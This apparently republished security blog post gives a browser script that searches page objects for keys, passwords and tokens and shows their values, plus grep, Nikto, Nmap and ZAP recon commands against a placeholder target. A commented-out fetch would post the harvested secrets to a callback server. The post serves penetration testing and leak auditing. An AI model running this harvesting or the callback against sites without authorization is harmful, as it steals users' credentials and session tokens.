
The article discusses a JavaScript script that can be used to scan the DOM for custom objects, particularly useful for security researchers and penetration testers. The script searches for sensitive information like keys, passwords, and authentication tokens stored in JavaScript objects.
You Should Know:
Here’s a modified version of the script with practical implementation details:
```javascript
// DOM Digging Script for Sensitive Data
const sensitiveTerms = [
  'key', 'password', 'auth', 'token', 'secret',
  'api', 'credential', 'login', 'session', 'private'
];

function scanDOMForSensitiveData() {
  const allElements = document.getElementsByTagName('*');
  const results = [];
  // Objects already visited, so cyclic references (window.window, parentNode, ...) are scanned once
  const seen = new WeakSet();

  // Recursive function to scan object properties
  function scanObject(obj, path = '') {
    if (obj === null || typeof obj !== 'object' || seen.has(obj)) return;
    seen.add(obj);
    try {
      for (const prop in obj) {
        // Call through Object.prototype so objects without a prototype do not throw
        if (Object.prototype.hasOwnProperty.call(obj, prop)) {
          const fullPath = path ? `${path}.${prop}` : prop;
          const value = obj[prop];
          // Check if property name contains sensitive terms
          const isSensitive = sensitiveTerms.some(term =>
            prop.toLowerCase().includes(term.toLowerCase())
          );
          if (isSensitive) {
            results.push({
              path: fullPath,
              value: value,
              type: typeof value
            });
          }
          // Recursively scan nested objects
          if (typeof value === 'object' && value !== null) {
            scanObject(value, fullPath);
          }
        }
      }
    } catch (e) {
      console.error(`Error scanning: ${path}`, e);
    }
  }

  // Scan global objects
  scanObject(window, 'window');

  // Scan all DOM elements
  Array.from(allElements).forEach(element => {
    try {
      scanObject(element, `element.${element.tagName}`);
    } catch (e) {
      console.error(`Error scanning element: ${element.tagName}`, e);
    }
  });

  return results;
}

// Execute and display results
const findings = scanDOMForSensitiveData();
console.table(findings);

// Optional: Post results to callback server
// fetch('https://your-callback-server.com/log', {
// method: 'POST',
// body: JSON.stringify(findings),
// headers: { 'Content-Type': 'application/json' }
// });
```
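Substring matching on property names also flags any name that merely contains a term, such as onkeydown or keyboardLayout. The following added example (not part of the original article; `words`, `redact`, `auditObject` and the sample object are illustrative names and constructed data) matches whole words of a property name instead, skips cycles, and redacts values so findings from your own application can be shared in a report. The trade-off is that all-lowercase run-together names such as accesstoken are not matched.

```javascript
// Added example: word-aware matching with redacted values (all names are illustrative).
const SENSITIVE = new Set(['key', 'password', 'auth', 'token', 'secret',
  'api', 'credential', 'login', 'session', 'private']);

// Split camelCase, snake_case and kebab-case names into lowercase words.
function words(name) {
  return name
    .replace(/([a-z0-9])([A-Z])/g, '$1 $2')
    .replace(/([A-Z]+)([A-Z][a-z])/g, '$1 $2')
    .split(/[^A-Za-z0-9]+/)
    .filter(Boolean)
    .map(w => w.toLowerCase());
}

// Keep only the length and the first/last two characters so the report does not carry the secret.
function redact(value) {
  const s = String(value);
  return s.length <= 8 ? '*'.repeat(s.length) : `${s.slice(0, 2)}...${s.slice(-2)} (${s.length} chars)`;
}

function auditObject(root, rootName, maxDepth = 6) {
  const findings = [];
  const seen = new WeakSet(); // visited objects, so cycles are walked once
  (function walk(obj, path, depth) {
    if (obj === null || typeof obj !== 'object' || seen.has(obj) || depth > maxDepth) return;
    seen.add(obj);
    for (const prop of Object.keys(obj)) {
      let value;
      try { value = obj[prop]; } catch (e) { continue; } // getter threw: skip this property only
      const hit = words(prop).some(w => SENSITIVE.has(w));
      // Report only populated string/number leaves; containers are walked, not reported.
      if (hit && ['string', 'number'].includes(typeof value) && String(value) !== '') {
        findings.push({ path: `${path}.${prop}`, value: redact(value) });
      }
      walk(value, `${path}.${prop}`, depth + 1);
    }
  })(root, rootName, 0);
  return findings;
}

// Constructed sample state standing in for a page's globals.
const sample = { onkeydown: 'handler', keyboardLayout: 'us',
  config: { apiKey: 'constructed-sample-value-0001', user: { session_token: 'abc123' } } };
sample.config.self = sample; // cycle, as with window.window
console.table(auditObject(sample, 'window'));
```

In a browser console the same function can be called as `auditObject(window, 'window')`.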
Linux Commands for Web Security Analysis:
```bash
# Use curl to analyze JavaScript files
curl -s https://target-site.com/main.js | grep -iE 'key|password|auth|token|secret'

# Use wget to download all JS files for offline analysis
# (--directory-prefix saves them under downloaded_files/, which the grep below reads)
wget --recursive --no-parent --accept js --directory-prefix=downloaded_files https://target-site.com/

# Analyze with grep
grep -r -i -E 'key|password|auth|token|secret' downloaded_files/

# Use Browser Developer Tools from command line
google-chrome --headless --disable-gpu --dump-dom https://target-site.com > dom_dump.html
```
Windows PowerShell Commands for DOM Analysis:
```powershell
# Download webpage content
Invoke-WebRequest -Uri "https://target-site.com" -OutFile page.html

# Search for sensitive patterns (Select-String is case-insensitive by default)
Select-String -Path "page.html" -Pattern "key|password|auth|token|secret"

# Analyze JavaScript files
$jsFiles = Get-ChildItem -Recurse -Include *.js
foreach ($file in $jsFiles) {
    Get-Content $file.FullName | Select-String -Pattern "key|password|auth|token|secret"
}
```
What Undercode Say:
DOM analysis is a critical skill for modern web security professionals. The script provided offers a foundation for identifying sensitive data leakage in client-side code. For comprehensive security analysis, combine this with:
```bash
# Use Burp Suite or OWASP ZAP for proxy analysis
zap.sh -cmd -quickurl https://target-site.com -quickout report.html

# Use Nikto for vulnerability scanning
nikto -h https://target-site.com -output nikto_results.txt

# Use Nmap for service enumeration (the NSE script for DOM-based XSS is named http-dombased-xss)
nmap -sV --script=http-dombased-xss,http-sql-injection target-site.com
```
Remember to always get proper authorization before testing any website. Ethical hacking requires permission.
Expected Output:
The script will output a table in the browser console showing all detected sensitive data structures in the DOM, including their location paths and values. For more advanced analysis, consider integrating with tools like Burp Suite or OWASP ZAP.
Reported By: Https: – Hackers Feeds


